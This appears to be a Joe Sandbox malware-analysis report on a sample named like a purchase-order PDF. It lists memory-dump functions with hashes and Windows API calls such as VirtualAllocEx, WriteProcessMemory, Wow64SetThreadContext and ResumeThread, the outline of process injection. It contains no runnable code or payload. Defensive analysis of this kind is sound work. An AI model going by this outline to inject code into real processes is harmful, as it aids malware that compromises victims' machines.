Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: t|-
API String ID: 0-3203574645
Opcode ID: 82dbce4bfd172d0d4aae23c873b54b60c07fb77c1d68fb627e3cbc4e4416b79f
Instruction ID: 6a422d96d91bbe308437b9fe7c465527a3f85471a41ab75576f7dd182abe7d73
Opcode Fuzzy Hash: 82dbce4bfd172d0d4aae23c873b54b60c07fb77c1d68fb627e3cbc4e4416b79f
Instruction Fuzzy Hash: 24B13970E09219DFCB14DFA4D980ADDBBF2FF4A300F2095A9D406AB255DB349842DF26

Function 090E6C70 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

Te]q, xrefs: 090E6D0E

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 4c1b2d29b5d1534e1e5993c52c244668c752cb77b19abaa3f4d76cb07ca6e86b
Instruction ID: 78199684a7e4dda790afafd22812e0b2611c660df96fa485e0825b5bc7c2eff4
Opcode Fuzzy Hash: 4c1b2d29b5d1534e1e5993c52c244668c752cb77b19abaa3f4d76cb07ca6e86b
Instruction Fuzzy Hash: D671D274E04208CFDB08CFA9D494AEDBBF6BF99310F10942AE419AB365D7325946CF50

Function 092912B0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098787865.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9290000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d6a392b787b7718c134f2637454bd11630271d5c2235d99934cf4a42d30a7a
Instruction ID: 7b6f781722f12bc2f8379f5bfdb6695e0f46c3dea06217918f90bdddb399901d
Opcode Fuzzy Hash: 80d6a392b787b7718c134f2637454bd11630271d5c2235d99934cf4a42d30a7a
Instruction Fuzzy Hash: A9328C70B252069FEB18DF6AD550BAEBBF7AF89300F244469E5069B3A1DB34DD01CB50

Function 0251D987 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d56f569376a2a09d9eaf1b9cde7c7fa4ae92bf3789a4ca92ab861a475f3982
Instruction ID: bc6268d73cb0043d05d0c51a8657f481b0039ca3edd3fc742618fa829f8d2a98
Opcode Fuzzy Hash: 43d56f569376a2a09d9eaf1b9cde7c7fa4ae92bf3789a4ca92ab861a475f3982
Instruction Fuzzy Hash: 69A1D336E0131A8FDB01DFB0D8849EDFBB6FF89304F158615E419AB2A5DB34A941CB51

Function 090E2850 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9165592736331c5bf7370bc810772ea4d89f8540b6a7d90051365004514250ed
Instruction ID: c60ad89578a8c27e846c65d42e6447a4c38f50735a6936e6a243b04d56cb368f
Opcode Fuzzy Hash: 9165592736331c5bf7370bc810772ea4d89f8540b6a7d90051365004514250ed
Instruction Fuzzy Hash: 69712575D0920DCFCB14CFA9D940AEEBBFABF89340F10A42AE429A7255D7305942CF50

Function 090E2860 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea5f6d2aa24cb138c8b6bac51c7a1efeb0785d7eb144eebbc46e289c31c0ccb
Instruction ID: bd8ba593594fc3bb04f971c45e76030fd0a786892dabe3205d78c533c8f5bd86
Opcode Fuzzy Hash: aea5f6d2aa24cb138c8b6bac51c7a1efeb0785d7eb144eebbc46e289c31c0ccb
Instruction Fuzzy Hash: F76103B5D0920DCFCF14DFA9D540AEEBBFABB89340F10A82AE429A7255D7305942CF50

Function 00BA83D0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ea59614c7dbcb1d72a81a9de3cff67f8ed5f954563fcd30ff2e676e26cbdda2
Instruction ID: bfcbeef7288bc5accebfdfece06ee829b187906e6f62ab7f45a28cc3337d4778
Opcode Fuzzy Hash: 8ea59614c7dbcb1d72a81a9de3cff67f8ed5f954563fcd30ff2e676e26cbdda2
Instruction Fuzzy Hash: 2F7104B4E05209DFCB04DFE5D5946AEBBB2FF89304F20846AD81AAB354DB349942CF51

Function 00BA1BB8 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75c04889243ef711facebd263fa673408efb610bac619ab5a178469f4f26d97
Instruction ID: 3a1ede9660e771d49c7681b5e377cd51f101f7361a42e064b0e7f6266a8b7f47
Opcode Fuzzy Hash: b75c04889243ef711facebd263fa673408efb610bac619ab5a178469f4f26d97
Instruction Fuzzy Hash: 91514974E492098FDB48CFAAC5406AEFBF2EF89311F24C46AD415AB255E7348A41CF54

Function 00BA2591 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec07c52f29634cc57052cebfb7094625d0bb40438c0e44efde8af36c60235342
Instruction ID: e5339e5fae3987252fd067943f66771beeac541c457f0230e889278003a75426
Opcode Fuzzy Hash: ec07c52f29634cc57052cebfb7094625d0bb40438c0e44efde8af36c60235342
Instruction Fuzzy Hash: D521C971E056188FEB58CFAAD8446DEBBF3AFC9350F14C0AAD409A7264DB345A46CF40

Function 090ED97C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090EDC4F

Strings

6(, xrefs: 090EDCC9
6(, xrefs: 090EDBA2
6(, xrefs: 090EDD8E

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: CreateProcess
String ID: 6($6($6(
API String ID: 963392458-1351461306
Opcode ID: f41b1a75a651c1e03b66327ba04c0119ae979cdfdb58101d85246b42fbc91f0f
Instruction ID: f09882a7d4fe126151be7c872a016f6d3bb713cc421971785c774673b98ecc50
Opcode Fuzzy Hash: f41b1a75a651c1e03b66327ba04c0119ae979cdfdb58101d85246b42fbc91f0f
Instruction Fuzzy Hash: 3AC10670D002198FDB25DFA8C845BEDBBB1FF49300F0495AAE419B7290DB749A85CF95

Function 090ED988 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090EDC4F

Strings

6(, xrefs: 090EDCC9
6(, xrefs: 090EDBA2
6(, xrefs: 090EDD8E

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: CreateProcess
String ID: 6($6($6(
API String ID: 963392458-1351461306
Opcode ID: 4f970d8431a36ac427622346fa7597b893183e088412f108f937c28fab7c4785
Instruction ID: d40b4fc8f1cd4bacad19100da58067ec6e31ca714e6aae4c553588ed40a70cd9
Opcode Fuzzy Hash: 4f970d8431a36ac427622346fa7597b893183e088412f108f937c28fab7c4785
Instruction Fuzzy Hash: 71C10670D002298FDB24DFA8C841BEDBBB1FF49300F0495AAE419B7290DB749A85CF94

Function 00BA8018 Relevance: 1.9, APIs: 1, Instructions: 411
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00BA8377

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 39bf62454c8b636244f1de36b0538c99ab4b0894ad0d79b28d7b2e7875756a83
Instruction ID: 50ca77be8dc363f1d2fee58079bf9fe5125ea46d6736d5e9a7118543c2d3b16f
Opcode Fuzzy Hash: 39bf62454c8b636244f1de36b0538c99ab4b0894ad0d79b28d7b2e7875756a83
Instruction Fuzzy Hash: 98E1B5E6E0E7C44FC712CB64686829EFFE25F77214B2984DFC4805B6A7E535980AC742

Function 02516B30 Relevance: 1.7, APIs: 1, Instructions: 226COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 02516DB2

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 39ede53ac2fa3a4a33db25798dbd66d809043123f57187500d0d007b93d62425
Instruction ID: 85d06448a07a8edfc314c59afd1d03456e0046c59cdb688dae143c2a6da30817
Opcode Fuzzy Hash: 39ede53ac2fa3a4a33db25798dbd66d809043123f57187500d0d007b93d62425
Instruction Fuzzy Hash: FA9104B0A007098FDB24CF69D584B9ABBF5FF88304F10892AE44697750DB35E945CF98

Function 0251D524 Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0251D6F1

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: eb2caf2d8fae30520b5365a1cbb0528bd242647822714e5d476f682d9b519126
Instruction ID: 9b118b80c61e2e2d7d590f432153ea9c2915184632508ca84e56a48ba498b961
Opcode Fuzzy Hash: eb2caf2d8fae30520b5365a1cbb0528bd242647822714e5d476f682d9b519126
Instruction Fuzzy Hash: FD718BB4D00218DFDF20CFA9D984BDDBBB1BF0A304F5491AAE818A7211D735A985CF55

Function 0251AF58 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0251D6F1

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0d2fc24d24dbdb4129b4e5a6a1bb38d956bdbe402f3ade71aa6d7c3b5d300487
Instruction ID: bc04361cd565d36d055042c11c34a9892d14adb5e5efae7a6cf4e8a8a1e7fb8e
Opcode Fuzzy Hash: 0d2fc24d24dbdb4129b4e5a6a1bb38d956bdbe402f3ade71aa6d7c3b5d300487
Instruction Fuzzy Hash: 53718BB4D01218DFDF20CFA9D984BDDBBB1BF0A304F1091AAE808A7211D734AA85CF44

Function 02510604 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02510701

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dcda235b597845d9a4d7b11f7668c07556ddee2633521633581bcdd64d8d8de9
Instruction ID: 45dcd7b4d145a78d4c06d3d5e46ad65e6c6dca58cf99457b863c3428d4bbff5b
Opcode Fuzzy Hash: dcda235b597845d9a4d7b11f7668c07556ddee2633521633581bcdd64d8d8de9
Instruction Fuzzy Hash: 8D5104B1D00218CFDB20DFA8C940BDEBBF5BF49300F1084AAD519AB251DB756A89CF91

Function 02510610 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02510701

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 995c0cc0fc2e17c5516e825752078bf933343399def5ed87ea2c6bdab317d6b9
Instruction ID: fecb2a13926f7ce214fd93a50a4cf82c4eb7877c3790646e388ddc9aaedec94e
Opcode Fuzzy Hash: 995c0cc0fc2e17c5516e825752078bf933343399def5ed87ea2c6bdab317d6b9
Instruction Fuzzy Hash: 7C51F3B1D00218CFDB20DFA9C940BDEBBF5BF49300F1084AAD509AB251DB756A89CF95

Function 090ED5F8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090ED6D3

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 49021bcc9f5a2274c9b28c8fe51314599d21ab66156e7129ca5e8b3744537829
Instruction ID: d2bed595e4839c17eeafe0372988dfbbe3ef7a6ed264c13e98382c65664df6dd
Opcode Fuzzy Hash: 49021bcc9f5a2274c9b28c8fe51314599d21ab66156e7129ca5e8b3744537829
Instruction Fuzzy Hash: E2419AB4D012589FCB00DFA9D584AEEBBF1FB49310F10942AE419B7250D739AA45CF64

Function 090ED600 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090ED6D3

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f8cd23d888c531ca5b4dce25083b92e4cf87541e2a532a3b6a2522a033bb730d
Instruction ID: c988c530479c2c8aae6e4c3ad9fb2e33e8679f26e57085bf56e29deabf2f29b3
Opcode Fuzzy Hash: f8cd23d888c531ca5b4dce25083b92e4cf87541e2a532a3b6a2522a033bb730d
Instruction Fuzzy Hash: 25419BB4D012589FCB00CFA9D984ADEFBF1FB49310F10942AE419B7250D735AA45CB64

Function 02519278 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0251934B

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c60ee2ae95bc4ba1f8388a7af137894a5b557eb6471b835d0176386d34350f46
Instruction ID: f3ae86ceb65641dd956310f8effc99c1a415e7d54bbe177cdbb94affaad2217b
Opcode Fuzzy Hash: c60ee2ae95bc4ba1f8388a7af137894a5b557eb6471b835d0176386d34350f46
Instruction Fuzzy Hash: C94176B9D002589FDB00CFA9D984ADEBBF5BB09310F14902AE918BB310D335A985CF94

Function 02516B10 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0251934B

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 447549b12a4cd8097a5f00dd8d195e8e8d712367b0fa5edcef640d5fbb3169e2
Instruction ID: ed13291620ddc00e4bff019898b0881f2de32b308cfb291aa8d59a4ee1d1d915
Opcode Fuzzy Hash: 447549b12a4cd8097a5f00dd8d195e8e8d712367b0fa5edcef640d5fbb3169e2
Instruction Fuzzy Hash: DC4176B9D002589FDB00CFA9D984ADEBBF5BB09310F14946AE918BB310D335A945CF94

Function 090ED750 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090ED80A

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a88c37d17200f69ee65fb95c50a0434c53a5ae2257eb2cd9cde198aafa42ca1c
Instruction ID: 99105b954a0e2f3fc2b85bd7f235d3893a8d3bc759a2e0420adfdd6db85d92da
Opcode Fuzzy Hash: a88c37d17200f69ee65fb95c50a0434c53a5ae2257eb2cd9cde198aafa42ca1c
Instruction Fuzzy Hash: 064198B5D002589FCF10CFAAD980AEEFBB1FB59310F10942AE819B7250C735A945CF68

Function 090ED758 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090ED80A

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3e0c2702be337b03d0a5926697b19331002e07de962b0084952277c9c21bd054
Instruction ID: 439dafa224397424088c93757448596e21d31aa11393b953582eb647a789d537
Opcode Fuzzy Hash: 3e0c2702be337b03d0a5926697b19331002e07de962b0084952277c9c21bd054
Instruction Fuzzy Hash: D84199B5D002589FCF10CFAAD984AEEFBB1FB59310F10942AE819B7250D735A945CF68

Function 090ED4DA Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090ED58A

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9b05ed36b6dff08396d5c73fb02bda9113a143c8c77d8b49e44472998404e376
Instruction ID: aa99d252b2dd997e9cd1ad17615833ced57a18136035bc1dc63f3098e0fa4e3b
Opcode Fuzzy Hash: 9b05ed36b6dff08396d5c73fb02bda9113a143c8c77d8b49e44472998404e376
Instruction Fuzzy Hash: 644198B9D002589FCF10CFA9D984A9EFBB1FB59310F10942AE819B7250D735A946CFA4

Function 090ED4E0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090ED58A

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 06aeb7f79ac6ee32236e35456b3dfb41f0a6ab58b842389dd05628a1f4706b06
Instruction ID: 8407cf7b1e7c59a80977e0a8030cf2b282ae2c732c0b1ea04399ba501f5e5f04
Opcode Fuzzy Hash: 06aeb7f79ac6ee32236e35456b3dfb41f0a6ab58b842389dd05628a1f4706b06
Instruction Fuzzy Hash: 6D3189B9D002589FCF10CFA9D980ADEFBB5FB59310F10942AE815B7250D735A945CFA4

Function 0251B0AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0251FD61

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b8861cadbec1dc5353a654acda7ab663b1f5faf1476ad1811ef2f929b257cf74
Instruction ID: 10f1837fe37de30b3231b06a8087ab37494b5bcce3b1d89ad0a75022ee614c92
Opcode Fuzzy Hash: b8861cadbec1dc5353a654acda7ab663b1f5faf1476ad1811ef2f929b257cf74
Instruction Fuzzy Hash: CD414BB8A00305DFDB14CF99C448AAABBF5FF88314F24C499D519AB321D374A841CFA4

Function 090ECF78 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 090ED02F

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 84fbe1506a42f2a399e418b16bd4106a52a5c525228d810a3b87d64facc559ff
Instruction ID: ddf73b95eaf2fa8561e48bbecf52ffac0663a66ba8699f982931e40a9e70b8ae
Opcode Fuzzy Hash: 84fbe1506a42f2a399e418b16bd4106a52a5c525228d810a3b87d64facc559ff
Instruction Fuzzy Hash: 7A41ACB4D012589FDB14DFA9D484AEEBBF1FB49310F14842AE419B7250C7399985CF54

Function 00BA82D0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00BA8377

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1b680e1e4fc26c77a0a6cace994158e2b2ddbfc295d3f7823c2a28fa2fcba122
Instruction ID: c25afffdb8dbb105ec79d3e38dfe3f182f02a187ca655f653e1c2822955dc756
Opcode Fuzzy Hash: 1b680e1e4fc26c77a0a6cace994158e2b2ddbfc295d3f7823c2a28fa2fcba122
Instruction Fuzzy Hash: 66319AB5D042589FCF10CFA9D484ADEFBF1BB09310F24906AE818B7210D775A945CFA8

Function 090ECF80 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 090ED02F

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0024441594609666480cdccd1e363c73b8356539f1ef4a7f6945f7b7f65a28e9
Instruction ID: 78cf0b1542b237747cf4bb711e13ffeff0518b3ea94cab4496122cbd9432f996
Opcode Fuzzy Hash: 0024441594609666480cdccd1e363c73b8356539f1ef4a7f6945f7b7f65a28e9
Instruction Fuzzy Hash: B431ACB4D012589FCB10CFA9D484AEEFBF1FB49310F14842AE419B7240C739A945CF94

Function 09290440 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 092904DB

Memory Dump Source

Source File: 00000000.00000002.2098787865.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9290000_PO-000172483 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a0c7ea184b6933ca688f5f373913a9b4461b54c93799792a579e8dd57d3d4d7b
Instruction ID: 55a2a7a63647308629c7f1b4e27633bb6d461f55e959da5d0917eeecab4e546a
Opcode Fuzzy Hash: a0c7ea184b6933ca688f5f373913a9b4461b54c93799792a579e8dd57d3d4d7b
Instruction Fuzzy Hash: 853167B9D002589FCF10CFA9D584A9EFBF5BB49310F24902AE818B7310D375A945CFA4

Function 09290438 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 092904DB

Memory Dump Source

Source File: 00000000.00000002.2098787865.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9290000_PO-000172483 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5bd40ab1fce07f00bf62319e6a6e40db20403fb8af80df6f097a856932da7560
Instruction ID: ec0fbc7a7f29bef5a9a3f0cd036db5a2528bf66c7e83f2439e7419acdab2dbcb
Opcode Fuzzy Hash: 5bd40ab1fce07f00bf62319e6a6e40db20403fb8af80df6f097a856932da7560
Instruction Fuzzy Hash: E33179B8D042489FCB10CFA9D580A9DFBF5AB09310F24905AE828B7320D335A945CF54

Function 00BAC528 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00BAC5C2

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: ac6423ed347cc500a4a1f151526318be310e812df3194bd43f1a55e5cd78cf3f
Instruction ID: 220d035cd79c5572ad48a38c94a0e800455befe46e43a932cce24f8f1b2ffec4
Opcode Fuzzy Hash: ac6423ed347cc500a4a1f151526318be310e812df3194bd43f1a55e5cd78cf3f
Instruction Fuzzy Hash: 683196B4D042489FCB14CFAAD585ADEFBF5AF49310F24906AE818B7360D734A945CFA4

Function 090ECE88 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 090ECF0E

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e503e0da9f043122db2ad50e322cfd389c823b6f24895c5da34c20951fb0750a
Instruction ID: 017dc13be8ffd96400aae42edfe2b191715e00068b14477ce60c91f38176e844
Opcode Fuzzy Hash: e503e0da9f043122db2ad50e322cfd389c823b6f24895c5da34c20951fb0750a
